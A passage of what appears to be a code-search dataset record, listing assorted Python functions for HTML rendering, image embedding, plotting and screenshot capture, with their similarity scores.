size_in_bytes = size_in_bytes / 1024\n size = \"{:.1f}\".format(size_in_bytes) + \" GB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" MB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" kB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" B\"\n\n histogram = \"\"\n\n if size_in_bytes < 100 * 1024 * 1024:\n if not labels:\n\n import numpy as np\n from .._tier2 import minimum_of_all_pixels, maximum_of_all_pixels\n from .._tier3 import histogram\n\n num_bins = 32\n\n h = np.asarray(histogram(self, num_bins=num_bins))\n\n plt.figure(figsize=(1.8, 1.2))\n plt.bar(range(0, len(h)), h)\n\n # hide axis text\n # https://stackoverflow.com/questions/2176424/hiding-axis-text-in-matplotlib-plots\n # https://pythonguides.com/matplotlib-remove-tick-labels\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([])\n frame1.axes.yaxis.set_ticklabels([])\n plt.tick_params(left=False, bottom=False)\n\n histogram = self._png_to_html(self._plt_to_png())\n\n min_max = \"<tr><td>min</td><td>\" + str(self.min()) + \"</td></tr>\" + \\\n \"<tr><td>max</td><td>\" + str(self.max()) + \"</td></tr>\"\n\n else:\n\n min_max = \"\"\n\n all = [\n 
\"<table>\",\n \"<tr>\",\n \"<td>\",\n image,\n \"</td>\",\n \"<td style=\\\"text-align: center; vertical-align: top;\\\">\",\n \"<b><a href=\\\"https://github.com/clEsperanto/pyclesperanto_prototype\\\" target=\\\"_blank\\\">cle._</a> image</b><br/>\",\n \"<table>\",\n \"<tr><td>shape</td><td>\" + str(self.shape).replace(\" \", \"&nbsp;\") + \"</td></tr>\",\n \"<tr><td>dtype</td><td>\" + str(self.dtype) + \"</td></tr>\",\n \"<tr><td>size</td><td>\" + size + \"</td></tr>\",\n min_max,\n \"</table>\",\n histogram,\n \"</td>\",\n \"</tr>\",\n \"</table>\",\n ]\n\n return \"\\n\".join(all)", "def html_page():\n return render_template('Map_twitter.html')", "def grabScreenshot(self):\n\n self.griddButton.setVisible(True)\n self.mirrorButton.setVisible(True)\n self.blurButton.setVisible(True)\n self.display1Button.setVisible(True)\n self.display2Button.setVisible(True)\n self.tutorialLabel.setVisible(False)\n\n print (\"Grabbing Screenshot\")\n print (\"Showing Buttons now\")\n\n with mss() as sct:\n monitor = sct.monitors[1]\n sct_img = sct.grab(monitor)\n # Convert to PIL/Pillow Image\n screenshots = Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX')\n screenshots.save(self.firstScreen, \"PNG\")\n\n # 2nd Display Screen shot\n\n monitor = sct.monitors[2]\n sct_img = sct.grab(monitor)\n # Convert to PIL/Pillow Image\n screenshots = Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX')\n screenshots.save(self.secondScreen, \"PNG\")\n self.photo.setPixmap(QtGui.QPixmap(self.firstScreen))\n self.statustext.setText(\"Added display 1 as work display for now\")\n self.ActivePhoto = \"Screenshot1.png\" # Set Photo as display 1 so we dont get callstack error when mirrroring", "def display(self):\n # this is so that each turtle gets their own canvas. 
Without this they all try to draw to the first created canvas\n self._randHash = random.getrandbits(128)\n \n # The actual forum seems to be able to display only one of the html texts, so merge them and send them all in one go\n htmlString = \"\";\n ## Canvas creation\n htmlString += ('<script type=\"text/javascript\">%s</script>'%ReadFile('paper.js')) + \"\\n\"\n htmlString += ('<canvas id=\"canv%s\" width=%spx height=%spx></canvas>'%(self._randHash, self._canvWidth, self._canvHeight)) + \"\\n\"\n \n \n # prepare data for injection\n self._arrayString = \"[\"\n for act in self._actions:\n self._arrayString += '[%s, %s, %s, %s, %s, %s, \"%s\", %s, \"%s\", \"%s\"], ' \\\n % (act[0], act[1], act[2], act[3], act[4], act[5], act[6], act[7], act[8], act[9])\n self._arrayString += \"]\"\n \n # inject data\n htmlString += ('<script type=\"text/javascript\">var actionData = %s; var levelData = %s;</script>'% (self._arrayString, self._levelDataString)) + \"\\n\"\n #print(self._levelDataString)\n \n ## Drawing the turtle\n htmlString += ('<script type=\"text/paperscript\" canvas=\"canv%s\">%s</script>'% (self._randHash, ReadFile('AtahansTurtle.js')))\n htmlString = htmlString.replace(\"actionData\", \"actionData\" + str(self._randHash));\n htmlString = htmlString.replace(\"levelData\", \"levelData\" + str(self._randHash));\n #print(htmlString);\n display(HTML(htmlString))", "def create_screenshot(driver: webdriver.Chrome, name: str):\n\n driver.save_screenshot(f\".\\\\{name}_{time.strftime('%d-%m_%H-%M-%S')}.png\")", "def create_screen(self, width, height):", "def generateRender(self, **options):\r\n\r\n path = options.get('path', '')\r\n resolution = options.get(\r\n 'resolution', QSize(mxs.renderWidth, mxs.renderHeight))\r\n pixelAspect = options.get('pixelAspect', 1.0)\r\n step = options.get('step', 1)\r\n frameRange = options.get('frameRange', [])\r\n missingFramesOnly = options.get('missingFramesOnly', False)\r\n\r\n if path:\r\n basePath = os.path.split(path)[0]\r\n if not os.path.exists(basePath):\r\n os.makedirs(basePath)\r\n\r\n if frameRange:\r\n bitmap = mxs.render(outputFile=path, fromFrame=frameRange[0], toFrame=frameRange[\r\n 1], camera=self._nativePointer, nthFrame=step, outputWidth=resolution.width(), outputHeight=resolution.height(), pixelAspect=pixelAspect)\r\n mxs.undisplay(bitmap)\r\n else:\r\n bitmap = mxs.render(outputFile=path, frame=mxs.pyHelper.namify(\r\n 'current'), camera=self._nativePointer, outputWidth=resolution.width(), outputHeight=resolution.height(), pixelAspect=pixelAspect)", "def call(self, **kwargs):\n # Format template\n template = self._cw.vreg.template_env.get_template(\"startup.logged.jinja2\")\n html = template.render(\n header_url=self._cw.data_url(\"creative/img/neurospin.jpg\"),\n moderator=False)\n self.w(html)", "def get(self):\n self.response.out.write(blobstore.create_upload_url(\n UPLOAD_SCREENSHOT_IMAGE_URL))", "def render(self):\n\n self.desert_image.render()\n self.cannon_image.render()\n self.play_button.render()\n self.escape_label.render()", "def output_to_html(string_data):\n raise NotImplementedError(\"This function is not yet Implemented!\")", "async def _take_screenshot(self, page: Page) -> None:\r\n page_id = self.pages[page]['id']\r\n # remove this page's old screenshot.\r\n for f in self.screenshot_dir.glob(f'*{page_id}.jpeg'):\r\n f.unlink()\r\n # take new screenshot.\r\n # quality=0 uses less CPU and still provides a pretty clear image.\r\n await page.screenshot(path=str(self.screenshot_dir.joinpath(\r\n 
f\"{datetime.now().strftime('%Y-%m-%d_%H:%M:%S')}_{page}.jpeg\")), quality=0)", "def create_html_snapshot_widget(ws_names2id: Dict[str, str], ws_paths: Dict[str, WorkspacePaths], output):\n workspace_chooser = widgets.Dropdown(\n options=ws_names2id,\n value=None,\n description='<b>Choose the workspace</b>:',\n style={'description_width': 'initial'},\n layout=widgets.Layout(width='900px')\n )\n notebook_chooser = widgets.SelectMultiple(\n options=[], # This will be populated after a workspace is chosen.\n value=[],\n description='<b>Choose one or more notebooks for which to create an HTML snapshot:</b>',\n style={'description_width': 'initial'},\n layout=widgets.Layout(width='900px')\n )\n commenter = widgets.Textarea(\n value='',\n placeholder='Type a comment here about this HTML snapshot of your notebook',\n description='<b>Comment</b>:',\n disabled=False,\n layout=widgets.Layout(width='900px', height='50px'),\n style={'description_width': 'initial'}\n )\n submit_button = widgets.Button(\n description='Submit',\n disabled=False,\n button_style='success',\n tooltip='Click the submit button to create the HTML snapshot.'\n )\n\n def on_button_clicked(_):\n with output:\n output.clear_output()\n if workspace_chooser.value is None:\n display(HTML('''<div class=\"alert alert-block alert-danger\">\n No workspace was selected. To create an HTML snapshot of a notebook, select the desired workspace.</div>'''))\n return\n workspace_paths = ws_paths[workspace_chooser.value]\n display(create_html_snapshot(notebook_paths=notebook_chooser.value,\n comment=commenter.value,\n workspace_paths=workspace_paths))\n submit_button.on_click(on_button_clicked)\n\n def on_choose_workspace(changed):\n output.clear_output()\n workspace_paths = ws_paths[changed['new']]\n workspace_notebooks = tf.io.gfile.glob(pattern=workspace_paths.get_notebook_file_glob())\n notebook_chooser.options = {os.path.basename(nb): nb for nb in workspace_notebooks}\n workspace_chooser.observe(on_choose_workspace, names='value')\n\n return widgets.VBox(\n [widgets.HTML('''\n <h3>Create an HTML snapshot of a notebook</h3>\n <p>Use this when you want to save an HTML snapshot of a notebook containing its outputs. 
The notebook will be rendered to HTML as-is (not re-run).\n <br>It will be saved in the <code>reports</code> folder of the workspace bucket:\n <br><ul>\n <li><code>gs://&lt;workspace bucket name&gt;/reports/&lt;your email address&gt;/&lt;date&gt;/&lt;time&gt;/&lt;notebook&gt;.html</code></li>\n <li><code>gs://&lt;workspace bucket name&gt;/reports/&lt;your email address&gt;/&lt;date&gt;/&lt;time&gt;/&lt;notebook&gt;.comment.txt</code></li>\n </ul>\n </p><hr>\n '''),\n workspace_chooser, notebook_chooser, commenter, submit_button],\n layout=widgets.Layout(width='auto', border='solid 1px grey'))", "def run(self) -> None:\n self._render()\n print(self.sio.getvalue())", "def plot_html(lats, lons, zoom=11, heatmap=True, scatter=True):\n gmap = gmplot.GoogleMapPlotter(np.median(lats), np.median(lons), zoom=zoom)\n \n if heatmap: gmap.heatmap(lats, lons)\n if scatter: gmap.scatter(lats, lons, 'k', size=6, marker=False)\n gmap.draw(\"/Users/ulfaslak/Desktop/mymap.html\")", "def create_html(html_filename, pulse_train):\n\n with open(html_filename, 'w') as html:\n html_open = \\\n \"\"\"\n <!DOCTYPE html>\n <html>\n <head>\n <title>Page Title</title>\n </head>\n <body>\n \n <img onclick=\"vibrate();\" src=\"https://pbs.twimg.com/media/CojtXEVWgAAAL1_.jpg\">\n \n </body>\n\n <script>\n\n function vibrate(){\n \"\"\"\n\n html_script = \"navigator.vibrate({});\".format(pulse_train)\n\n html_close = \\\n \"\"\"\n console.log(\"VIBRATE\");\n }\n </script>\n </html>\n \"\"\"\n html.write(html_open)\n html.write(html_script)\n html.write(html_close)", "def call(self, **kwargs):\n # Format template\n template = self._cw.vreg.template_env.get_template(\"startup.logged.jinja2\")\n html = template.render(\n header_url=self._cw.data_url(\"creative/img/neurospin.jpg\"),\n moderator=True)\n self.w(html)", "def export_html(self):\n self._svg_warning_displayed = False\n super(RichJupyterWidget, self).export_html()", "def show_browser(self) -> None:\n\n # set delete = False to avoid early delete when user open multiple plots.\n with NamedTemporaryFile(suffix=\".html\", delete=False) as tmpf:\n pass\n with open(tmpf.name, \"w\") as file:\n file.write(self.template_base.render(context=self.context))\n webbrowser.open_new_tab(f\"file://{tmpf.name}\")", "def embed_image_html(imgBGR, target_width=TARGET_WIDTH, target_height=TARGET_HEIGHT):\n import cv2\n from PIL import Image\n if target_width is not None:\n imgBGR = _resize(imgBGR, t_width=target_width)\n elif target_width is not None:\n imgBGR = _resize(imgBGR, t_height=target_height)\n imgRGB = cv2.cvtColor(imgBGR, cv2.COLOR_BGR2RGB)\n pil_img = Image.fromarray(imgRGB)\n string_buf = StringIO()\n pil_img.save(string_buf, format='jpeg')\n data = string_buf.getvalue().encode('base64').replace('\\n', '')\n return 'data:image/jpeg;base64,' + data", "def render_html(title, text, is_test=False):\n template = open(resolve(\"html/page.mustache\")).read()\n return pystache.render(template, {'title': title, 'content': text,\n 'app_title': DISPLAY_NAME,\n 'context': CONTEXT,\n 'is_test': is_test})", "async def puppeteer_screenshot(archive_id, url_id, date, url, pics_out_path, timeout_duration):\n\n browser = await launch()\n page = await browser.newPage()\n await page.setViewport({'height': 768, 'width': 1024})\n await page.goto(url, timeout=(int(timeout_duration) * 1000))\n await page.screenshot(path='{0}{1}.{2}.{3}.png'.format(pics_out_path, archive_id, url_id, date))\n await browser.close()", "def view_log():\n g.title = \"View Log\"\n log = ShotLog().get_text() #log is a 
generator\n \n return render_template('log_viewer.html',log=log)", "def embed_image_html(image, type):\n if type == 'dehaze':\n image_pil = Image.fromarray((image).astype('uint8'))\n elif type == 'style_transfer':\n image_pil = Image.fromarray((image).astype('uint8'))\n else:\n image_pil = Image.fromarray((255 * image).astype('uint8'))\n if sys.version_info.major == 2:\n string_buf=StringIO.StringIO()\n image_pil.save(string_buf, format='png')\n data = string_buf.getvalue().encode('base64').replace('\\n', '')\n else:\n _buf = BytesIO()\n image_pil.save(_buf, format='png')\n _buf.seek(0)\n b64_buf = base64.b64encode(_buf.getvalue())\n string_buf = StringIO(b64_buf.decode('utf-8', errors='replace'))\n data =string_buf.getvalue().replace('\\n', '')\n\n return 'data:image/png;base64,' + data", "def get_html(self):\n\n # these 3 will be used in class methods\n self.html_id = self.location.html_id()\n self.html_class = self.location.category\n self.configuration_json = self.build_configuration_json()\n params = {\n 'gst_html': self.substitute_controls(self.render),\n 'element_id': self.html_id,\n 'element_class': self.html_class,\n 'configuration_json': self.configuration_json\n }\n content = self.system.render_template(\n 'graphical_slider_tool.html', params)\n return content", "def make_html(depends=(files['image.gif'],),\n targets=(files['index.html'],)):\n\n index_html = open(files['index.html'].rel, 'w')\n index_html.write(pyyaks.context.render(html_template))\n index_html.close()", "def _repr_html_(self): # pragma: no cover\n return Utils.render_html('extent.html', extent=self)", "def screenshot_vfb(url, **args):\n size = args.pop('size', (1024, 768))\n vfb = Xvfb(display_spec='%dx%dx24' % size)\n if not vfb.display:\n print 'Error creating display'\n return None\n print 'Xvfb: %d %s' % (vfb.proc.pid, vfb.display)\n try:\n return screenshot(url, **args)\n finally:\n print 'Terminate vfb %d' % vfb.proc.pid\n vfb.close()", "def make_page(keyword, html):\n output = []\n addline = output.append\n\n addline('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">')\n addline('<html>')\n addline('<head>')\n addline('<title>Tweets for #%s</title>' % (keyword))\n addline('<style type=\"text/css\">')\n addline('div.tweet_container { float: right; width: 400px; font-size: 0.8em; border: 2px solid darkblue; padding: 8px; height: 80%; overflow-y: scroll; }')\n addline('div.tweet_container h3 { margin: 0; padding: 0; text-align: center; color: darkblue; margin-bottom: 6px; padding-bottom: 6px; border-bottom: 2px solid darkblue; }')\n addline('div.tweet { clear: both; }')\n addline('div.tweetphoto { float:left; width: auto; margin: 0; padding: 0; }')\n addline('div.tweetphoto img { border: none; width: 48px; height: 48px; display: block; margin: 0; margin-bottom: 24px; margin-right: 8px; padding: 0; }')\n addline('div.tweetphoto a > img { border: 1px solid black; }')\n addline('</style>')\n addline('</head>')\n addline('<body>')\n\n addline(html)\n\n addline('</div>')\n addline('</body>')\n addline('</html>')\n return '\\n'.join(output)", "def _ScreenshotCmd(self, file_path):\n return [self._SCREENSHOT_BINARY, '-f', file_path]", "def get_html(self):\r\n\r\n # these 3 will be used in class methods\r\n self.html_id = self.location.html_id()\r\n self.html_class = self.location.category\r\n\r\n self.configuration_json = self.build_configuration_json()\r\n params = {\r\n 'gst_html': self.substitute_controls(self.render),\r\n 'element_id': self.html_id,\r\n 
'element_class': self.html_class,\r\n 'configuration_json': self.configuration_json\r\n }\r\n content = self.system.render_template(\r\n 'graphical_slider_tool.html', params\r\n )\r\n return content", "def display(self):\n display(self.image)", "def TakeScreenshot(self, file_path):\n # When running remotely, taking a screenshot to the specified |file_path|\n # may fail due to differences between the device and host. We also want\n # to save a copy to /var/log/ on the device, as it is saved by CrOS bots.\n # Address both by taking the screenshot to /var/log/ and either copying\n # to the correct location in local mode or pulling to the correct location\n # in remote mode.\n basename = os.path.basename(file_path)\n var_path = '/var/log/screenshots/%s' % basename\n dir_name = os.path.dirname(file_path)\n self.RunCmdOnDevice(['mkdir', '-p', '/var/log/screenshots'])\n stdout, stderr = self.RunCmdOnDevice(['/usr/local/sbin/screenshot',\n var_path,\n '&&',\n 'echo',\n 'screenshot return value:$?'])\n if self.local:\n self.RunCmdOnDevice(['mkdir', '-p', dir_name])\n self.RunCmdOnDevice(['cp', var_path, file_path])\n else:\n try:\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n self.GetFile(var_path, file_path)\n except OSError as e:\n logging.error('Unable to pull screenshot file %s to %s: %s',\n var_path, file_path, e)\n logging.error('Screenshot capture output: %s\\n%s', stdout, stderr)\n return 'screenshot return value:0' in stdout", "def render(self, mode='human'):", "def _render(self):\n self.dirty = False\n self.image = self.font.render(self._text, self.aa, self.color_fg)\n self.rect = self.image.get_rect()", "def render_browser_script(scene, sig=None, *, filename=None,\n default_color=Color.DEFAULT, default_static=False, **kwargs):\n html_code = generate_full_html(\n scene, sig=sig, default_color=default_color, default_static=default_static, **kwargs)\n if filename is None:\n hash_object = hashlib.md5(html_code.encode())\n filename = hash_object.hexdigest() + '.html'\n with open(filename, 'w', encoding='utf8') as fo:\n print(html_code,file=fo)\n webbrowser.open(filename)", "def screen_shot(self):\n screen_size = '{}x{}@{}x{}/0'.format(self.screen[0], self.screen[1], self.screen[0], self.screen[1])\n subprocess.check_call([\n ADB_EXECUTOR, '-s', self.device_id, 'shell',\n 'LD_LIBRARY_PATH=/data/local/tmp', '/data/local/tmp/minicap', '-s', '-P', screen_size,\n '>', TEMP_PIC_ANDROID_PATH\n ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n logger.info('screen shot saved in {}'.format(TEMP_PIC_ANDROID_PATH))", "def screenshot(self, path=getcwd(), name=\"screenshot.png\", element=None):\n\t\tp = path +\"/\"+name\n\t\tif element is not None:\n\t\t\ttry:\n\t\t\t\tassert(type(element)) == webdriver.firefox.webelement.FirefoxWebElement\n\t\t\t\telement.save_screenshot(p)\n\t\t\t\treturn 0\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"Unable to save screenshot using given element\\n{}\".format(e))\n\t\t\t\treturn -1\n\t\tself.driver.save_screenshot(p)\n\t\treturn 0", "def capture_screenshot_for_step(step, when):\r\n if world.auto_capture_screenshots:\r\n scenario_num = step.scenario.feature.scenarios.index(step.scenario) + 1\r\n step_num = step.scenario.steps.index(step) + 1\r\n step_func_name = step.defined_at.function.func_name\r\n image_name = \"{prefix:03d}__{num:03d}__{name}__{postfix}\".format(\r\n prefix=scenario_num,\r\n num=step_num,\r\n name=step_func_name,\r\n postfix=when\r\n )\r\n world.capture_screenshot(image_name)", "def screenshot_log(level, message, 
screenshot_file):\n with open(screenshot_file, \"rb\") as image_file:\n file_data = image_file.read()\n item_log(level, message, {\"name\": screenshot_file.split(os.path.sep)[-1],\n \"data\": file_data,\n \"mime\": \"image/png\"})" ]
[ "0.6781203", "0.67746735", "0.6765626", "0.6692511", "0.6436723", "0.62806684", "0.62287426", "0.62287426", "0.6214485", "0.61541307", "0.6063398", "0.6000311", "0.5993428", "0.59772694", "0.59754765", "0.5933216", "0.59321904", "0.58835065", "0.5881337", "0.5876187", "0.5874557", "0.5847862", "0.5822839", "0.5818481", "0.5810587", "0.58024925", "0.58013743", "0.5793616", "0.5783022", "0.57813567", "0.57791847", "0.57709813", "0.5768524", "0.5751391", "0.5716658", "0.5708282", "0.5707206", "0.5701", "0.5698449", "0.5689132", "0.56837463", "0.5657982", "0.56494135", "0.56466097", "0.56445926", "0.5643945", "0.56406665", "0.5637489", "0.5632606", "0.56323737", "0.56276804", "0.5621493", "0.55876267", "0.5586509", "0.55860436", "0.5581289", "0.55618954", "0.55598295", "0.55595297", "0.55575097", "0.5521625", "0.55215526", "0.5511708", "0.5507683", "0.5503391", "0.5498968", "0.54933244", "0.5477815", "0.54664236", "0.5464901", "0.5463216", "0.54597837", "0.54537356", "0.5450437", "0.54463035", "0.5445723", "0.5445119", "0.5408654", "0.5400887", "0.5399566", "0.53884935", "0.5383568", "0.5378658", "0.53782856", "0.53729814", "0.537123", "0.53707117", "0.53698564", "0.5368437", "0.53683877", "0.5359189", "0.5356138", "0.53528196", "0.53506786", "0.5348461", "0.5346261", "0.5342142", "0.5335547", "0.5333839", "0.53325856" ]
0.6651713
4
Transform incoming data to a homogeneous 2d array.
def transform(self, X):
    shape = len(X), self.max_len
    Xt = self.pad_value * np.ones(shape, dtype=self.dtype)
    for i, arr in enumerate(X):
        m = min(self.max_len, len(arr))
        if not m:
            continue
        arr = np.array(arr[:m])
        Xt[i, :m] = arr
    return Xt
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process(self, data):\n data = np.atleast_2d(data)\n\n if self.orientation == 'row':\n return data\n else:\n return data.T", "def _to_numpy_ndarray(cls, data):\n if isinstance(data, np.ndarray):\n return data\n arr = np.array(data, dtype=np.float)\n if len(arr.shape) == 1:\n arr = np.reshape(arr, newshape=(1, arr.shape[0]))\n return arr", "def to_2d_array(self):\n return reshape_fns.to_2d(self._obj, raw=True)", "def config_to_array(data):\n return np.array(data[\"data\"]).reshape(data[\"rows\"], data[\"cols\"])", "def flat_to_2d(data, det_width):\n return data.reshape((data.shape[0], data.shape[1], det_width, det_width))", "def transform(self, x: Array2D) -> Array2D:", "def make_2d(x):\n return x.reshape((1, len(x)))", "def _handle_input_data(data):\n data = np.asarray(data)\n if np.ndim(data) == 1:\n d_rows = 1\n d_cols = len(data)\n data = data.reshape((1, data.shape[0]))\n elif np.ndim(data) == 2:\n d_rows = data.shape[0]\n d_cols = data.shape[1]\n else:\n raise ValueError(\"Incorrect dimensionality of data. Must be <= 2\")\n return data, d_rows, d_cols", "def _to_ndarray(data):\n return np.atleast_1d(getattr(data, 'values', data))", "def get_data(data):\n\n np_data = np.array(data)\n array = []\n\n for i in range(0, np_data.shape[1]):\n array.append(np_data[:, i])\n\n return np.array(array)", "def get_data(data):\n\n np_data = np.array(data)\n array = []\n\n for i in range(0, np_data.shape[1]):\n array.append(np_data[:, i])\n\n return np.array(array)", "def to_2dnp_array(X):\r\n if isinstance(X, np.ndarray):\r\n if X.ndim == 1:\r\n return X.reshape((-1, 1))\r\n if X.ndim == 2:\r\n return X\r\n if isinstance(X, Number):\r\n X = [X]\r\n X = np.array(X)\r\n X = X.reshape([-1, np.prod(X.shape) // X.shape[0]])\r\n return X", "def ndarray(self):\n if self._coord_format != constants.MatrixCoordinateDefault:\n self._logger.error(\"invalid coordinate format\")\n raise NotImplementedError(\"invalid coordinate format\")\n\n data = self.clear().data.collect()\n\n result = np.zeros(self._shape, dtype=self._dtype)\n\n for e in data:\n result[e[0], e[1]] = e[2]\n\n return result", "def _to_arraylike(data):\n _load_objects()\n if data is None:\n raise ValueError('Cannot convert None data.')\n return None\n if not isinstance(data, (ndarray, DataArray, DataFrame, Series, Index)):\n data = np.asarray(data)\n if not np.iterable(data):\n data = np.atleast_1d(data)\n return data", "def dataConvertToNumpy( self ):\n self.featureNumpy = np.asarray( self.feature )\n self.ClassNumpy = np.asarray( self.Class )", "def getArray2d(self):\n\t\treturn self.array2d", "def __array__(self):\n return np.asarray(self.data)", "def augment_data(self,data):\n d = np.empty([data.shape[0]+2,data.shape[1]+2])\n d[1:-1,1:-1] = data\n d[0,1:-1] = data[0,:]\n d[1:-1,0] = data[:,0]\n d[-1,1:-1] = data[-1,:]\n d[1:-1,-1] = data[:,-1]\n d[0,0] = data[0,0]\n d[-1,-1] = data[-1,-1]\n d[0,-1] = data[0,-1]\n d[-1,0] = data[-1,0]\n return d", "def _process(self, data: np.ndarray) -> np.ndarray:", "def _process(self, data: np.ndarray) -> np.ndarray:", "def to_numpy(data):\n fields = [\n \"x\", \"y\", \"z\",\n \"proximity\"\n ]\n return np.array([[row[field] for field in fields] for row in data])", "def transform(self, data):\n unflattened = [unflatten_vec(d) for d in data]\n return numpy.array([self.signature(uf)\n for uf in unflattened])", "def data():\n return RaggedArray(\n [[0, 1], [1, 2, 3, 4], [], [-1, -2], []]*20, dtype='float64')", "def data_reshape(image):\n image_mat = []\n if image.shape[-1] == 3:\n for x, i in 
enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j[0], j[1], j[2]])\n else:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j])\n return np.array(image_mat)", "def to_fits_array(self):\n return self.data", "def image_to_array(self, img):\n x = np.asarray(img, dtype=self.dtype)\n if len(x.shape) == 3:\n if self.channels_first:\n x = x.transpose(2, 0, 1)\n elif len(x.shape) == 2:\n if self.channels_first:\n x = x.reshape((1, x.shape[0], x.shape[1]))\n else:\n x = x.reshape((x.shape[0], x.shape[1], 1))\n else:\n raise ValueError('Unsupported image shape: ', x.shape)\n return x", "def m2n(buf, shape, typecode, ismatrix=False):\n a = np.frombuffer(buf, dtype=typecode).reshape(shape)\n if ismatrix: a = np.asmatrix(a)\n return a", "def processing_data(raw_data):\n data = np.frombuffer(raw_data, np.uint8)\n data = np.reshape(data, [data.shape[0]//1029, -1])\n data = data[:, 5:]\n data = np.reshape(data, [1, -1])\n data = 256 * data[0, 0::2] + data[0, 1::2]\n data = 10 * (data / 65535)\n data = np.reshape(data, [-1, 8]).T\n return data", "def flatten_data(data):\r\n result = []\r\n for mesurements in data:\r\n result.append(mesurements.flatten())\r\n return np.array(result)", "def to_array(self):\n return np.array(self.to_image())", "def to_image_space(data):\n return np.swapaxes(np.flip(data, 1), 0, 1)", "def make_data(self, data):\n return array(data, dtype=float32)", "def _convert_to_array(stream):\n if not isinstance(stream, Stream):\n raise TypeError('Input object should be an obspy stream.')\n\n nt = len(stream.traces[0].data)\n nr = len(stream)\n output = np.zeros((nt, nr))\n\n #hey, this is pretty much what's in Stream: turple list, (number, trace) \n #trace has the attribute of data. The data can be regarded to a column of data. \n for i, trace in enumerate(stream):\n output[:, i] = trace.data[:]\n\n return output", "def to_numpy(x):\r\n return x.squeeze().detach().cpu().numpy()", "def _read_data(self):\n return [np.array([]), np.array([])]", "def make_homogeneous(self, points: np.ndarray) -> np.ndarray:\r\n return np.hstack((points[:, 0], np.ones(points.shape[0]).reshape(-1, 1),))", "def prepare_data(data):\n\n image_array = np.zeros(shape=(len(data), 48, 48))\n image_label = np.array(list(map(int, data['emotion'])))\n\n for i, row in enumerate(data.index):\n image = np.fromstring(data.loc[row, 'pixels'], dtype=int, sep=' ')\n image = np.reshape(image, (48, 48))\n\n image = face_detection(image.astype(np.uint8))\n\n image_array[i] = image\n\n return image_array, image_label", "def get_data():\n data = [np.array([32.,595.]),\n np.array([30.,599.]),\n np.array([18.,622.]),\n np.array([51.,606.]),\n np.array([38.,578.])]\n return data", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_circs = 0\n self._n_shots = 0\n self._n_slots = 0\n self._n_iq = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError:\n try:\n # level1 data averaged over shots\n self._n_circs, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"Data given to {self.__class__.__name__} is not likely level1 data.\"\n ) from ex\n\n if self._validate:\n if self._n_iq != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} does not have two-dimensions \"\n f\"(I and Q). 
Instead, {self._n_iq} dimensions were found.\"\n )\n\n return data", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 0] * self.scale", "def atleast_2d(x):\n return np.atleast_2d(x).T if x.ndim < 2 else x", "def _prepare_data(self, coords):\n return np.array([coords])", "def data_for_grouping():\n return RaggedArray(\n [[1, 0], [1, 0], [], [], [0, 0], [0, 0], [1, 0], [2, 0]])", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_shots = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"The data given to {self.__class__.__name__} does not have the shape of \"\n \"single-shot IQ data; expecting a 4D array.\"\n ) from ex\n\n if self._validate:\n if data.shape[-1] != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} must be a multi-dimensional array\"\n \"of dimension [d0, d1, ..., 2] in which the last dimension \"\n \"corresponds to IQ elements.\"\n f\"Input data contains element with length {data.shape[-1]} != 2.\"\n )\n\n if self._validate:\n if isinstance(self._discriminator, list):\n if self._n_slots != len(self._discriminator):\n raise DataProcessorError(\n f\"The Discriminator node has {len(self._discriminator)} which does \"\n f\"not match the {self._n_slots} slots in the data.\"\n )\n\n return unp.nominal_values(data)", "def provide_data(self):\r\n # import pdb; pdb.set_trace()\r\n # for k, v in self.data:\r\n # print k,v\r\n return [(k, tuple([1] + list(v.shape[1:]))) for k, v in self.data]", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 1] * self.scale", "def _data_reshape(self, data):\n data_offset = [int(size / 2) for size in data.shape[1:]]\n data_diff = [int(size / 2) for size in self.shape]\n data_diff_min = data_diff\n data_diff_max = []\n for i, elem in enumerate(data_diff):\n if self.shape[i] % 2 == 0:\n data_diff_max.append(elem)\n else:\n data_diff_max.append(elem + 1)\n data = data[:, (data_offset[0] - data_diff_min[0]):(data_offset[0] + data_diff_max[0]),\n (data_offset[1] - data_diff_min[1]):(data_offset[1] + data_diff_max[1]),\n (data_offset[2] - data_diff_min[2]):(data_offset[2] + data_diff_max[2])]\n\n if data.shape[1] == 1:\n data = data.reshape(data.shape[0], data.shape[2], data.shape[3])\n return data", "def toarray(self, order=None, out=None):\n d = self._process_toarray_args(order, out)\n for i, row in enumerate(self.rows):\n for pos, j in enumerate(row):\n d[i, j] = self.data[i][pos]\n return d", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n\n self._n_shots = len(data[0])\n self._n_circuits = len(data)\n\n if self._validate:\n if data.shape[:2] != (self._n_circuits, self._n_shots):\n raise DataProcessorError(\n f\"The datum given to {self.__class__.__name__} does not convert \"\n \"of an array with dimension (number of circuit, number of shots).\"\n )\n\n return data", "def vertify(data: list):\n assert len(data) == 4\n n = [float(d) for d in data]\n return np.array([[n[0], n[1]], [n[2], n[1]], [n[2], n[3]], [n[0], n[3]], [n[0], n[1]]])", "def as_matrix(self):\n return self._data", "def provide_data(self):\n return [(k, v.shape) for k, v in self.data]", "def 